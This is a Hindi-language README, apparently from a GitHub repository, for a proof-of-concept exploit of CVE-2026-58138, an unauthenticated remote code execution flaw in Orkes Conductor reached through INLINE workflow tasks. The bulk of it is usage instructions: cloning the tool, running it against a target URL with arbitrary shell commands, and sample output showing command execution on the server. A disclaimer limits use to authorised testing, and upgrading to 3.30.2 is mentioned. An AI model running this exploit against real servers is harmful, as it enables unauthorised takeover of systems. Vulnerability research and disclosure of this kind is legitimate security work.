
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) बिना प्रमाणीकरण के RCE, INLINE GraalVM evaluator के माध्यम से
Orkes Conductor में गंभीर रिमोट कोड निष्पादन भेद्यता
CVE-2026-58138 एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता है जो Orkes Conductor के संस्करण 3.21.21 से 3.30.1 को प्रभावित करती है। यह भेद्यता हमलावरों को बिना किसी प्रमाणीकरण की आवश्यकता के Conductor सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे सिस्टम से पूर्ण समझौता हो सकता है।
यह भेद्यता Orkes Conductor के वर्कफ़्लो इंजन में INLINE कार्य प्रकार में मौजूद है। INLINE कार्य eval के माध्यम से Java ऑब्जेक्ट तक पहुंच के साथ JavaScript मूल्यांकन का समर्थन करता है, जिससे हमलावर निम्न कार्य कर सकता है:
INLINE कार्य युक्त एक दुर्भावनापूर्ण वर्कफ़्लो पंजीकृत करनाjava.lang.Runtime.exec() के माध्यम से Conductor सर्वर पर सिस्टम कमांड चलाना| संस्करण सीमा | स्थिति |
|---|---|
| 3.21.21 - 3.30.1 | ✅ असुरक्षित |
| > 3.30.1 | ❌ पैच किया गया |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 या उसके बाद के संस्करण मेंकेवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए। केवल उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
⭐ यह उपयोगी लगा? इसे GitHub पर स्टार दें ⭐